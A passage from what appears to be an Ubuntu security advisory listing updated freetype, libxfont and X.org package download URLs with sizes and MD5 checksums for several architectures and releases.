http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/libfreetype6-udeb_2.1.7-2.4ubuntu1.3_powerpc.udeb Size/MD5: 230642 65a12121f60f8096bea04955e30ae42a http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6_2.1.7-2.4ubuntu1.3_powerpc.deb Size/MD5: 382478 7b1ac5f12fdba3482ad3251c3c24bef3 http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont-dev_0.99.0+cvs.20050909-1.3_powerpc.deb Size/MD5: 286022 d37d7708a0341cd63c1390fb0ff387a9 http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont1-dbg_0.99.0+cvs.20050909-1.3_powerpc.deb Size/MD5: 373114 ed63b7e61d8a65f90cd8c3599d0c96a6 http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont1_0.99.0+cvs.20050909-1.3_powerpc.deb Size/MD5: 237726 289174b8732579cc6b38f50f6398525e http://security.ubuntu.com/ubuntu/pool/main/x/xorg/x-window-system-core_6.8.2-77.3_powerpc.deb Size/MD5: 65746 c5de437f4027dec1acb8640bf14c4ccf http://security.ubuntu.com/ubuntu/pool/main/x/xorg/x-window-system-dev_6.8.2-77.3_powerpc.deb Size/MD5: 65774 9d5e6b227f9799035e83f10ffa1f4cbe http://security.ubuntu.com/ubuntu/pool/universe/x/xorg/xdmx_6.8.2-77.3_powerpc.deb Size/MD5: 1006498 218159bdb9b8b250ef184881db5364e6 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xlibs-static-dev_6.8.2-77.3_powerpc.deb Size/MD5: 114636 384d4379cf21cc360da3f74252dc6e48 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xlibs-static-pic_6.8.2-77.3_powerpc.deb Size/MD5: 110580 054183b9a9c8a86fefac3017592eeb3f http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xnest_6.8.2-77.3_powerpc.deb Size/MD5: 1477044 d49494dfeb3fbb06cc60ac2397b104b4 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-common_6.8.2-77.3_powerpc.deb Size/MD5: 123370 5084044b08a994ade1e05ca769fbfeab http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-core_6.8.2-77.3_powerpc.deb Size/MD5: 4153716 d136a45467ed83aa7c9be079d38bbea1 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-dbg_6.8.2-77.3_powerpc.deb Size/MD5: 17841844 cc6a10b4f49e0a3dc197f4b4a25be310 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-ati_6.8.2-77.3_powerpc.deb Size/MD5: 316180 8da85e525823bd09bc3648d5f642baad http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-chips_6.8.2-77.3_powerpc.deb Size/MD5: 158800 f6957aec1dfb811624d4223b3b8792c3 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-fbdev_6.8.2-77.3_powerpc.deb Size/MD5: 74910 886ebb1cc261a13774fb37442f67b04b http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-glint_6.8.2-77.3_powerpc.deb Size/MD5: 177164 4df697145e0bc9e405269f370c098ad3 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-imstt_6.8.2-77.3_powerpc.deb Size/MD5: 74766 af48765f0b61b699ef013e7fb91d0563 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-mga_6.8.2-77.3_powerpc.deb Size/MD5: 154718 49e8c9067f4196f735100fdb88abf241 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-nv_6.8.2-77.3_powerpc.deb Size/MD5: 133938 1f37af997b732cce638c2f442ac32c27 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-s3_6.8.2-77.3_powerpc.deb Size/MD5: 98722 fd531207bb51ee7557839113134c03de http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-s3virge_6.8.2-77.3_powerpc.deb Size/MD5: 107536 eb327385a5f0410f9a1180d7c6808903 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-savage_6.8.2-77.3_powerpc.deb Size/MD5: 110162 a70cd8531c61382bcc07b92a34202bed http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-sis_6.8.2-77.3_powerpc.deb Size/MD5: 368234 fde514af99dfabf48ab685c95a95249b http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-tdfx_6.8.2-77.3_powerpc.deb Size/MD5: 100614 d6dabc2023c08f6379f0fb98d3c076b3 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-trident_6.8.2-77.3_powerpc.deb Size/MD5: 142422 42f616549b5dac01f66403b64d5c5e5c http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-v4l_6.8.2-77.3_powerpc.deb Size/MD5: 74212 d6d45dde725417a9a4b014c65a41cb12 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-vga_6.8.2-77.3_powerpc.deb Size/MD5: 76358 450f581f1d862d20f67f0054ea46cc66 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-acecad_6.8.2-77.3_powerpc.deb Size/MD5: 70846 9b2d0fa88f4fa0edacffdef2ee62901a http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-aiptek_6.8.2-77.3_powerpc.deb Size/MD5: 82626 b4af3fee8db47771e9325f634119c6b4 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-calcomp_6.8.2-77.3_powerpc.deb Size/MD5: 70766 2f945c77af13fed6788bdabc71c312ce http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-citron_6.8.2-77.3_powerpc.deb Size/MD5: 93244 e8dee7a2b70acb94d51c7cd1c1e97b9c http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-digitaledge_6.8.2-77.3_powerpc.deb Size/MD5: 71734 e73893cfe3b9d5b693569c2382905cf1 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-dmc_6.8.2-77.3_powerpc.deb Size/MD5: 70374 7082960291a9bb88d003eeeb4285358b http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-dynapro_6.8.2-77.3_powerpc.deb Size/MD5: 69938 d7113c27bbd386c14ff9a2b712c51342 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-elographics_6.8.2-77.3_powerpc.deb Size/MD5: 74028 4bd41187c68fa51fb0adced0ccaad0ac http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-fpit_6.8.2-77.3_powerpc.deb Size/MD5: 70956 a0f37dfd435cba240a1d3a35f27841aa http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-hyperpen_6.8.2-77.3_powerpc.deb Size/MD5: 74336 41cacbfcdc99b42b0264d82a7578a8ec http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-kbd_6.8.2-77.3_powerpc.deb Size/MD5: 74960 52611ed1fc10530d4ab44fd16577bce1 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-magellan_6.8.2-77.3_powerpc.deb Size/MD5: 69550 22c49ab9f187bdca55a0fbb83857ce25 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-microtouch_6.8.2-77.3_powerpc.deb Size/MD5: 72498 44c3195bdcf64c2c5cf8504f6089e619 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-mouse_6.8.2-77.3_powerpc.deb Size/MD5: 99586 ac9781c897e4dc052af9c9c80a4853db http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-mutouch_6.8.2-77.3_powerpc.deb Size/MD5: 74312 6d10ae854f4e4a3c5f137950e307db5f http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-palmax_6.8.2-77.3_powerpc.deb Size/MD5: 71850 80b3b7bd7b567be9d5dd896e8613ec16 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-penmount_6.8.2-77.3_powerpc.deb Size/MD5: 70548 37d1b7c034b9f792608d3e6dd2a867d1 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-spaceorb_6.8.2-77.3_powerpc.deb Size/MD5: 69216 7ee83181573ac45a56f2a4fb044a5e6f http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-summa_6.8.2-77.3_powerpc.deb Size/MD5: 74222 a0f33d1df407af5b5a6c51a5882a9e60 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-tek4957_6.8.2-77.3_powerpc.deb Size/MD5: 71126 9140e6af3e6ad35bd68a5f5968399b0b http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-void_6.8.2-77.3_powerpc.deb Size/MD5: 67622 d3f49e28e34a285865f8870b3eeb8aae http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-wacom_6.8.2-77.3_powerpc.deb Size/MD5: 106738 88fbfbd6e6ad9f5336552ec2e50ec9a1 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg_6.8.2-77.3_powerpc.deb Size/MD5: 274024 93076262a05833b4807e98699103d946 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xvfb_6.8.2-77.3_powerpc.deb Size/MD5: 1590104 e71d49333a98a285fe438d08e48ca2e9 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/freetype2-demos_2.1.7-2.4ubuntu1.3_sparc.deb Size/MD5: 68646 bd18602999ade0786089cf0c117a8340 http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-dev_2.1.7-2.4ubuntu1.3_sparc.deb Size/MD5: 699952 0697ae616e5f96afe661a7a121eaf8ee http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/libfreetype6-udeb_2.1.7-2.4ubuntu1.3_sparc.udeb Size/MD5: 216454 7d29da7d817ac7ff1c6d7914630493ad http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6_2.1.7-2.4ubuntu1.3_sparc.deb Size/MD5: 367276 9024cd052d0210a8bacdaff20589b06c http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont-dev_0.99.0+cvs.20050909-1.3_sparc.deb Size/MD5: 294964 b666356962ef9506da0b76efd05c9908 http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont1-dbg_0.99.0+cvs.20050909-1.3_sparc.deb Size/MD5: 324238 7dfef6defc80be665990fcbdd0e08e2e http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont1_0.99.0+cvs.20050909-1.3_sparc.deb Size/MD5: 232476 dd914e38e4765a07e0980dd6ad5907b8 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/x-window-system-core_6.8.2-77.3_sparc.deb Size/MD5: 65744 69da99ffdd8daf0a439b098b2e284b32 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/x-window-system-dev_6.8.2-77.3_sparc.deb Size/MD5: 65772 de0733e94929d4379e05d3c88a13a285 http://security.ubuntu.com/ubuntu/pool/universe/x/xorg/xdmx_6.8.2-77.3_sparc.deb Size/MD5: 920880 2d70ca5f3de16d1192b1c05d99e21d93 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xlibs-static-dev_6.8.2-77.3_sparc.deb Size/MD5: 112780 bf763538fea32c5f73f85ab86438014b http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xlibs-static-pic_6.8.2-77.3_sparc.deb Size/MD5: 108622 99531cb07cdffc17daf11727bc7e11bf http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xnest_6.8.2-77.3_sparc.deb Size/MD5: 1357838 e4491783b6a9e3d45d19a1ffa086bc81 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-common_6.8.2-77.3_sparc.deb Size/MD5: 123326 32c21b631ab344dd58d27bf7a62c605b http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-core_6.8.2-77.3_sparc.deb Size/MD5: 3746340 8e6087848c828cfc5d72cde99b21242b http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-dbg_6.8.2-77.3_sparc.deb Size/MD5: 19778476 767707fd2df5e224381a33fa872cf19a http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-apm_6.8.2-77.3_sparc.deb Size/MD5: 124424 081cfba509d6784ba22518521c18aa79 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-ark_6.8.2-77.3_sparc.deb Size/MD5: 73344 ca0e2f22257a9911dbbe7c9c0f479d57 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-ati_6.8.2-77.3_sparc.deb Size/MD5: 302440 861d677e1de334391174481377f437cf http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-chips_6.8.2-77.3_sparc.deb Size/MD5: 152068 643d54a96746678c36f17c3ffd3ab91c http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-cirrus_6.8.2-77.3_sparc.deb Size/MD5: 99108 b1a219d38a08ec0a3ca4cecba79a2784 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-dummy_6.8.2-77.3_sparc.deb Size/MD5: 70306 2b541fd5e4f10f05266800b2f977f120 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-fbdev_6.8.2-77.3_sparc.deb Size/MD5: 74052 448582ffd40305e797cf2815c6f9c1a0 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-glint_6.8.2-77.3_sparc.deb Size/MD5: 174824 44a2ace41f17b1f0da1c3ff7199de0f0 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-i128_6.8.2-77.3_sparc.deb Size/MD5: 90378 e8c95b12f1882e1f9294cb9821dff299 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-i740_6.8.2-77.3_sparc.deb Size/MD5: 88784 7069730f8ea7530b607c0ecdedabe693 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-imstt_6.8.2-77.3_sparc.deb Size/MD5: 74196 a67897463a21167d281a29fab9414ecf http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-mga_6.8.2-77.3_sparc.deb Size/MD5: 151636 442a736cb4530a699e4ea844e01763a0 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-neomagic_6.8.2-77.3_sparc.deb Size/MD5: 98780 9b374f040468ddfa4c8559c63e4598e1 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-newport_6.8.2-77.3_sparc.deb Size/MD5: 75054 e41f20599375cef562d50cfd5ea91f22 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-nv_6.8.2-77.3_sparc.deb Size/MD5: 130164 7d81597fa246853896dee123c93a3443 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-rendition_6.8.2-77.3_sparc.deb Size/MD5: 89382 0c4f8f40654fdd09e520145ca2e886bd http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-s3virge_6.8.2-77.3_sparc.deb Size/MD5: 105294 1f6862c1c719219da1b965623774def5 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-savage_6.8.2-77.3_sparc.deb Size/MD5: 107562 634a4e99cee1f7ed5a96fa6d1e5053aa http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-siliconmotion_6.8.2-77.3_sparc.deb Size/MD5: 106838 ca4bcbbcbb250fc4374477ef17dd5dbd http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-sunbw2_6.8.2-77.3_sparc.deb Size/MD5: 68678 95aa8f3f675f84b9b445fd5a85c75952 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-suncg14_6.8.2-77.3_sparc.deb Size/MD5: 69252 2d87f35b35295d29bdd76a8172351ac2 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-suncg3_6.8.2-77.3_sparc.deb Size/MD5: 68734 8809dd6543372feddd2a5886f6976776 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-suncg6_6.8.2-77.3_sparc.deb Size/MD5: 69728 1b59fdb3a45e0a569445b34d064d0633 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-sunffb_6.8.2-77.3_sparc.deb Size/MD5: 127670 0b38955174a4ed44bd4578c87da66684 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-sunleo_6.8.2-77.3_sparc.deb Size/MD5: 81660 117464ff17f748d0c95aa59f89abf250 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-suntcx_6.8.2-77.3_sparc.deb Size/MD5: 70446 e69222c475300674077226d927e4a156 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-tdfx_6.8.2-77.3_sparc.deb Size/MD5: 99410 33d1cafe6bf0edca99ba9392966d6ab7 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-tga_6.8.2-77.3_sparc.deb Size/MD5: 87728 726ce3e0143dafcd495e3de4a40cf8c0 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-trident_6.8.2-77.3_sparc.deb Size/MD5: 131950 e98574be1b719debd2c4542b199cdfcc http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-v4l_6.8.2-77.3_sparc.deb Size/MD5: 73412 b1d2672fcf4c22e883e9b93ddfe70e1a http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-vesa_6.8.2-77.3_sparc.deb Size/MD5: 76710 1254832b3fa89d4cf901bce0bb79c6ba http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-vga_6.8.2-77.3_sparc.deb Size/MD5: 75206 36b39c918f6061dd11711972d2025110 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-vmware_6.8.2-77.3_sparc.deb Size/MD5: 82618 c65b2958ebcc66702c6db1a24aee3813 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-acecad_6.8.2-77.3_sparc.deb Size/MD5: 70412 26c69d8e78229e07af1aa8176594728d http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-aiptek_6.8.2-77.3_sparc.deb Size/MD5: 80920 710cf56fd1e938d25cd1b0ad6a524a08 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-calcomp_6.8.2-77.3_sparc.deb Size/MD5: 70316 83f3d61a2bed0574b25b2b0afb808ff6 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-citron_6.8.2-77.3_sparc.deb Size/MD5: 91828 01867c3013e5a645d22cd97dc2068e1c http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-digitaledge_6.8.2-77.3_sparc.deb Size/MD5: 71154 447987785afddd40f58871ed82d1d8c7 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-dmc_6.8.2-77.3_sparc.deb Size/MD5: 69880 df7253bb410088887e963b4ec185a761 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-dynapro_6.8.2-77.3_sparc.deb Size/MD5: 69582 772f0ae3564c523c6f010b9e54b9dbe6 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-elographics_6.8.2-77.3_sparc.deb Size/MD5: 73168 0a6bc07c0a89ed382852a9f22212882f http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-fpit_6.8.2-77.3_sparc.deb Size/MD5: 70622 a647189fd612aad8b9d57ee1d8d29da4 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-hyperpen_6.8.2-77.3_sparc.deb Size/MD5: 73350 e5ca5c4d5c85b8b58a2d966c9cc122a5 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-kbd_6.8.2-77.3_sparc.deb Size/MD5: 74194 2d9b7ab568db94f2fdfbf9208c51f269 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-magellan_6.8.2-77.3_sparc.deb Size/MD5: 69170 bd51f60f99bea164a1655bf99d81080d http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-microtouch_6.8.2-77.3_sparc.deb Size/MD5: 71910 f439b8d1778d01df70f869e04d0f916a http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-mouse_6.8.2-77.3_sparc.deb Size/MD5: 97820 daa144c86465f941bad248f7f2011095 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-mutouch_6.8.2-77.3_sparc.deb Size/MD5: 73544 67eead253f6f73a4c95cff9ee3fe5e45 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-palmax_6.8.2-77.3_sparc.deb Size/MD5: 71470 462bf1db6bf06a3541c048e978f619e1 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-penmount_6.8.2-77.3_sparc.deb Size/MD5: 70044 56d63787661918acfa11b4c2edf1b363 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-spaceorb_6.8.2-77.3_sparc.deb Size/MD5: 68896 407a96555ef0aca1c0f862756985bcc4 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-summa_6.8.2-77.3_sparc.deb Size/MD5: 73208 c124d986e5ede6f22d2e6e4468ef44da http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-tek4957_6.8.2-77.3_sparc.deb Size/MD5: 70788 139b257d986d1d81abc5df96ff6c07ac http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-void_6.8.2-77.3_sparc.deb Size/MD5: 67526 da4b3fa6d2ea2cd03ff074fae1f99e11 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-wacom_6.8.2-77.3_sparc.deb Size/MD5: 102200 d20486be0bd003c871362662945890ce http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg_6.8.2-77.3_sparc.deb Size/MD5: 274186 2936a9182f8fe998082ea1b094cb4d84 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xvfb_6.8.2-77.3_sparc.deb Size/MD5: 1463574 ed56597df856cf23c99ea94b0df46132 Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/f/freetype/freetype_2.1.10-1ubuntu2.3.diff.gz Size/MD5: 59540 862bd1b35276a1f6295ab86afbb0c585 http://security.ubuntu.com/ubuntu/pool/main/f/freetype/freetype_2.1.10-1ubuntu2.3.dsc Size/MD5: 710 e45aa32ea5d21cea1443eef299963ab6 http://security.ubuntu.com/ubuntu/pool/main/f/freetype/freetype_2.1.10.orig.tar.gz Size/MD5: 1323617 adf145ce51196ad1b3054d5fb032efe6 http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont_1.0.0-0ubuntu3.3.diff.gz Size/MD5: 7292 53e0bf4639f85be2596ea73128f9786f http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont_1.0.0-0ubuntu3.3.dsc Size/MD5: 743 fb5f2db984b7aa11cc61b95c08908f4e http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont_1.0.0.orig.tar.gz Size/MD5: 816966 29c00c678d4ac9bea8ffe7ba264825d0 http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xorg-server_1.0.2-0ubuntu10.6.diff.gz Size/MD5: 31362 fb578e86128d4cefd37470d2b1b7a800 http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xorg-server_1.0.2-0ubuntu10.6.dsc Size/MD5: 1804 b8fa2ff2adefb6457a217c145f0a99ee http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xorg-server_1.0.2.orig.tar.gz Size/MD5: 7966941 f44f0f07136791ed7a4028bd0dd5eae3 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/freetype2-demos_2.1.10-1ubuntu2.3_amd64.deb Size/MD5: 133862 9849bf94a3c83769fee1c8c40cc5a195 http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-dev_2.1.10-1ubuntu2.3_amd64.deb Size/MD5: 717494 0b0587f17aa8338d68f00f4f6de40cf8 http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/libfreetype6-udeb_2.1.10-1ubuntu2.3_amd64.udeb Size/MD5: 251748 ea23cce32b15ed7b944ceea15a7c28c4 http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6_2.1.10-1ubuntu2.3_amd64.deb Size/MD5: 439876 f4511db24d690e234e2c6157f6f0d86d http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont-dev_1.0.0-0ubuntu3.3_amd64.deb Size/MD5: 302752 cdb9b9f31fc890e1f81b6b84e62e6743 http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont1-dbg_1.0.0-0ubuntu3.3_amd64.deb Size/MD5: 375884 261b8c8db1350e1729a58bf14455f0d2 http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont1_1.0.0-0ubuntu3.3_amd64.deb Size/MD5: 242806 0d259ee4f74d911e61e8d6c1c3fd45a9 http://security.ubuntu.com/ubuntu/pool/universe/x/xorg-server/xdmx-tools_1.0.2-0ubuntu10.6_amd64.deb Size/MD5: 49900 6cd998c1385119c61c656454fcafdc57 http://security.ubuntu.com/ubuntu/pool/universe/x/xorg-server/xdmx_1.0.2-0ubuntu10.6_amd64.deb Size/MD5: 848976 1de01ffe87bc9aad344ceebf57136501 http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xnest_1.0.2-0ubuntu10.6_amd64.deb Size/MD5: 1414328 fcd5128c61ea7c91f5dd0fdd67eb04fd http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xserver-xorg-core_1.0.2-0ubuntu10.6_amd64.deb Size/MD5: 4048070 8a20c1e88020a82b1831541874ce7c48 http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xserver-xorg-dev_1.0.2-0ubuntu10.6_amd64.deb Size/MD5: 294524 6b2619e3fbfc72356dc7afa6ee3afa0e http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xvfb_1.0.2-0ubuntu10.6_amd64.deb Size/MD5: 1564542 9ba68a1f137e86d212d7eb264008f4cd i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/freetype2-demos_2.1.10-1ubuntu2.3_i386.deb Size/MD5: 117358 a678e7f1914fdc53c66bc12b2563c104 http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-dev_2.1.10-1ubuntu2.3_i386.deb Size/MD5: 677468 1245a799d53d0326992d1fa22bad875b http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/libfreetype6-udeb_2.1.10-1ubuntu2.3_i386.udeb Size/MD5: 227264 9c15e03342736754f33977e838c6d801 http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6_2.1.10-1ubuntu2.3_i386.deb Size/MD5: 415384 7ae6d5bbe1a4bde544290a80a3e3dc3f http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont-dev_1.0.0-0ubuntu3.3_i386.deb Size/MD5: 279004 3551439419ec533ee6e13b4ddad9879f http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont1-dbg_1.0.0-0ubuntu3.3_i386.deb Size/MD5: 320798 e118c7ba341674944cd61dce7dd45266 http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont1_1.0.0-0ubuntu3.3_i386.deb Size/MD5: 216576 9357f5af25709f7e2c5627960a1c965c http://security.ubuntu.com/ubuntu/pool/universe/x/xorg-server/xdmx-tools_1.0.2-0ubuntu10.6_i386.deb Size/MD5: 42444 13fe0025f651e11decf5072e9ba7c88e http://security.ubuntu.com/ubuntu/pool/universe/x/xorg-server/xdmx_1.0.2-0ubuntu10.6_i386.deb Size/MD5: 748738 8c8fb9a5513045b418ffc3c37337aaa9 http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xnest_1.0.2-0ubuntu10.6_i386.deb Size/MD5: 1241568 96276d9b49ce87040e0d355de948d7af http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xserver-xorg-core_1.0.2-0ubuntu10.6_i386.deb Size/MD5: 3531364 addce36a358f8e1566118b490517d0d1 http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xserver-xorg-dev_1.0.2-0ubuntu10.6_i386.deb Size/MD5: 294542 401c8007c96f3468eee908422fe384d5 http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xvfb_1.0.2-0ubuntu10.6_i386.deb Size/MD5: 1382554 bfdc3acaba7eae4bfa8f09466c1a14f1 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/freetype2-demos_2.1.10-1ubuntu2.3_powerpc.deb Size/MD5: 134248 3f73867444b6902b21ece5e88bda5736 